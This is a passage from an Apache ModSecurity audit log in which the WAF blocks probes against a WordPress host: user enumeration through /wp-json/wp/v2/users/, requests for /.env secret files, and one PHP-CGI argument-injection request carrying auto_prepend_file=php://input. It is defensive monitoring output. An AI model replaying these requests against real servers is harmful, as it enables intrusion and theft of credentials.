Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747326741627209 3147 (- - -) Stopwatch2: 1747326741627209 3147; combined=1348, p1=417, p2=893, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eabcf63f-Z-- --b22e4f26-A-- [15/May/2025:23:52:39 +0700] aCYb1z0MuKCmW-Q80KvUKgAAAEE 103.236.140.4 53130 103.236.140.4 8181 --b22e4f26-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.5.237.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.5.237.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b22e4f26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b22e4f26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747327959759058 3342 (- - -) Stopwatch2: 1747327959759058 3342; combined=1468, p1=511, p2=925, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b22e4f26-Z-- --8fa16f43-A-- [16/May/2025:00:23:26 +0700] aCYjDn5oxhgjPv2ZXtn92wAAAI0 103.236.140.4 42900 103.236.140.4 8181 --8fa16f43-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.153.129 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.153.129 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8fa16f43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fa16f43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747329806219861 878 (- - -) Stopwatch2: 1747329806219861 878; combined=351, p1=309, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fa16f43-Z-- --f6aad40a-A-- [16/May/2025:01:12:31 +0700] aCYujz0MuKCmW-Q80KsJ_QAAAFY 103.236.140.4 47572 103.236.140.4 8181 --f6aad40a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Accept-Charset: utf-8 --f6aad40a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6aad40a-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747332751249856 658 (- - -) Stopwatch2: 1747332751249856 658; combined=295, p1=250, p2=0, p3=0, p4=0, p5=45, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6aad40a-Z-- --c2491b21-A-- [16/May/2025:01:48:53 +0700] aCY3FX5oxhgjPv2ZXtk3AQAAAIg 103.236.140.4 41446 103.236.140.4 8181 --c2491b21-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c2491b21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2491b21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747334933064633 700 (- - -) Stopwatch2: 1747334933064633 700; combined=298, p1=261, p2=0, p3=0, p4=0, p5=37, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2491b21-Z-- --b04be177-A-- [16/May/2025:02:03:45 +0700] aCY6kX5oxhgjPv2ZXtlAdwAAAIU 103.236.140.4 55162 103.236.140.4 8181 --b04be177-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.205.46.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.205.46.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b04be177-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b04be177-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747335825625516 2495 (- - -) Stopwatch2: 1747335825625516 2495; combined=1155, p1=376, p2=752, p3=0, p4=0, p5=26, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b04be177-Z-- --7c8b0a71-A-- [16/May/2025:02:45:33 +0700] aCZEXUZPp_O9UFIYjNZYVwAAAMk 103.236.140.4 39108 103.236.140.4 8181 --7c8b0a71-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.152 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.152 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --7c8b0a71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c8b0a71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747338333773907 849 (- - -) Stopwatch2: 1747338333773907 849; combined=333, p1=295, p2=0, p3=0, p4=0, p5=38, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c8b0a71-Z-- --d19ea255-A-- [16/May/2025:02:45:34 +0700] aCZEXu8rcsLSwEaopQJ_2wAAAAA 103.236.140.4 39184 103.236.140.4 8181 --d19ea255-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.152 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.152 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --d19ea255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d19ea255-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747338334910957 642 (- - -) Stopwatch2: 1747338334910957 642; combined=283, p1=242, p2=0, p3=0, p4=0, p5=41, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d19ea255-Z-- --a84d4a76-A-- [16/May/2025:02:58:11 +0700] aCZHU0ZPp_O9UFIYjNZjWAAAAMU 103.236.140.4 55754 103.236.140.4 8181 --a84d4a76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.217.205.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.217.205.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a84d4a76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a84d4a76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747339091785167 3114 (- - -) Stopwatch2: 1747339091785167 3114; combined=1347, p1=464, p2=853, p3=0, p4=0, p5=29, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a84d4a76-Z-- --73607d6d-A-- [16/May/2025:03:12:12 +0700] aCZKnO8rcsLSwEaopQKQJAAAAAU 103.236.140.4 37578 103.236.140.4 8181 --73607d6d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 82.135.209.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.135.209.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --73607d6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73607d6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747339932610690 2779 (- - -) Stopwatch2: 1747339932610690 2779; combined=1259, p1=412, p2=814, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73607d6d-Z-- --1b85995a-A-- [16/May/2025:03:13:49 +0700] aCZK_e8rcsLSwEaopQKQhAAAABY 103.236.140.4 38820 103.236.140.4 8181 --1b85995a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.211.143.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.211.143.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1b85995a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b85995a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747340029191971 2915 (- - -) Stopwatch2: 1747340029191971 2915; combined=1448, p1=493, p2=923, p3=0, p4=0, p5=32, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b85995a-Z-- --f8f19b68-A-- [16/May/2025:04:33:12 +0700] aCZdmEE0LfP59mkCzg7zHgAAANE 103.236.140.4 58936 103.236.140.4 8181 --f8f19b68-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 191.36.149.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 191.36.149.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f8f19b68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8f19b68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747344792292931 3565 (- - -) Stopwatch2: 1747344792292931 3565; combined=1500, p1=497, p2=971, p3=0, p4=0, p5=32, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8f19b68-Z-- --e59aec5a-A-- [16/May/2025:05:18:08 +0700] aCZoIMe47ocjCGWTS4b26wAAAEs 103.236.140.4 60452 103.236.140.4 8181 --e59aec5a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.11.1.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.11.1.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e59aec5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e59aec5a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747347488602967 2977 (- - -) Stopwatch2: 1747347488602967 2977; combined=1383, p1=485, p2=863, p3=0, p4=0, p5=35, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e59aec5a-Z-- --b67efa0c-A-- [16/May/2025:06:05:19 +0700] aCZzL8e47ocjCGWTS4b3YgAAAEs 103.236.140.4 33898 103.236.140.4 8181 --b67efa0c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.34.1.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.34.1.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b67efa0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b67efa0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747350319259179 3184 (- - -) Stopwatch2: 1747350319259179 3184; combined=1357, p1=493, p2=834, p3=0, p4=0, p5=30, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b67efa0c-Z-- --7619b41b-A-- [16/May/2025:06:05:59 +0700] aCZzV0E0LfP59mkCzg7zugAAAM0 103.236.140.4 33920 103.236.140.4 8181 --7619b41b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --7619b41b-C-- --7619b41b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7619b41b-E-- --7619b41b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747350359820119 3668 (- - -) Stopwatch2: 1747350359820119 3668; combined=1983, p1=496, p2=1456, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7619b41b-Z-- --0231c52b-A-- [16/May/2025:07:12:41 +0700] aCaC-ce47ocjCGWTS4b3-AAAAEg 103.236.140.4 36228 103.236.140.4 8181 --0231c52b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.176.16.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.176.16.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0231c52b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0231c52b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747354361290574 3168 (- - -) Stopwatch2: 1747354361290574 3168; combined=1345, p1=491, p2=824, p3=0, p4=0, p5=30, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0231c52b-Z-- --8b62d256-A-- [16/May/2025:07:15:24 +0700] aCaDnMe47ocjCGWTS4b4CQAAAE0 103.236.140.4 36376 103.236.140.4 8181 --8b62d256-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 69.175.120.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 69.175.120.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8b62d256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b62d256-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747354524812747 3504 (- - -) Stopwatch2: 1747354524812747 3504; combined=1528, p1=541, p2=950, p3=0, p4=0, p5=37, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b62d256-Z-- --e1788b7b-A-- [16/May/2025:08:38:35 +0700] aCaXG9e6THFz1hsaJaKOqgAAAAM 103.236.140.4 37980 103.236.140.4 8181 --e1788b7b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 54.36.176.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 54.36.176.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e1788b7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1788b7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: 